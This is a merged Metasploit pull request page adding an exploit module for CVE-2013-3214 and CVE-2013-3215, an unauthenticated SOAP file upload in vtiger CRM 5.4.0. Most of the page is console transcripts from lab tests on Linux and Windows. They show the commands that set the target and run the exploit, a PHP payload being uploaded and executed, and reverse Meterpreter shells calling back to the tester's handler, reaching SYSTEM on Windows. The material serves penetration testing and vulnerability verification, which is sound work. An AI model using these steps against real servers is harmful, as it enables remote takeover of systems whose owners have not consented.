Add module for CVE-2013-3214, CVE-2013-3215 #2820

Merged: wchen-r7 merged 1 commit into rapid7:master from jvazquez-r7:vtiger_attach on Jan 6, 2014

@jvazquez-r7
Contributor

Tested with vtiger CRM 5.4.0 on Windows 2003 SP2 and Ubuntu 10.0.4. Info about how to test in both OSes is included.

Verification on Linux

include_path = ".:/var/www/vtigercrm"
  • Reload / restart Apache to take the PHP configuration change into account.
  • Use the exploit to get a session (check can be used to detect whether your SOAP interface is really available and vulnerable)
msf > use exploit/multi/http/vtiger_soap_upload 
msf exploit(vtiger_soap_upload) > show options

Module options (exploit/multi/http/vtiger_soap_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /vtigercrm/      yes       Base vTiger CRM directory path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   vTigerCRM v5.4.0


msf exploit(vtiger_soap_upload) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(vtiger_soap_upload) > check
[+] The target is vulnerable.
msf exploit(vtiger_soap_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:80 - Uploading payload...
[+] 192.168.172.133:80 - Upload successfully uploaded
[*] 192.168.172.133:80 - Executing payload...
[*] Sending stage (39848 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:49587) at 2014-01-02 11:20:38 -0600
[+] Deleted WwuBmyiXquzIrZt.php


^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > pwd
/var/www/vtigercrm/soap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(vtiger_soap_upload) > 

Verification on Windows

include_path = ".;C:\Program Files\vtigercrm-5.4.0\apache\htdocs\vtigerCRM"
  • Restart vTiger to be sure the new PHP configuration applies.
  • Use the exploit to get a session (check can be used to detect whether your SOAP interface is really available and vulnerable). In the sample, the default options for the Windows install are used:
msf exploit(vtiger_soap_upload) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(vtiger_soap_upload) > set rport 8888
rport => 8888
msf exploit(vtiger_soap_upload) > set TARGETURI /
TARGETURI => /
msf exploit(vtiger_soap_upload) > check
[+] The target is vulnerable.
msf exploit(vtiger_soap_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8888 - Uploading payload...
[+] 192.168.172.136:8888 - Upload successfully uploaded
[*] 192.168.172.136:8888 - Executing payload...
[*] Sending stage (39848 bytes) to 192.168.172.136
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:2631) at 2014-01-02 11:24:18 -0600
[+] Deleted zmxLprRAcSXnWie.php

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
eComputer    : JUAN-6ED9DB6CA8
OS          : Windows NT JUAN-6ED9DB6CA8 5.2 build 3790
Meterpreter : php/php
meterpreter > pwd
eC:\Program Files\vtigercrm-5.4.0\apache\htdocs\vtigerCRM\soap
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(vtiger_soap_upload) > 

@wchen-r7 wchen-r7 merged commit 1b893a5 into rapid7:master Jan 6, 2014
@jvazquez-r7 jvazquez-r7 deleted the vtiger_attach branch November 18, 2014 15:58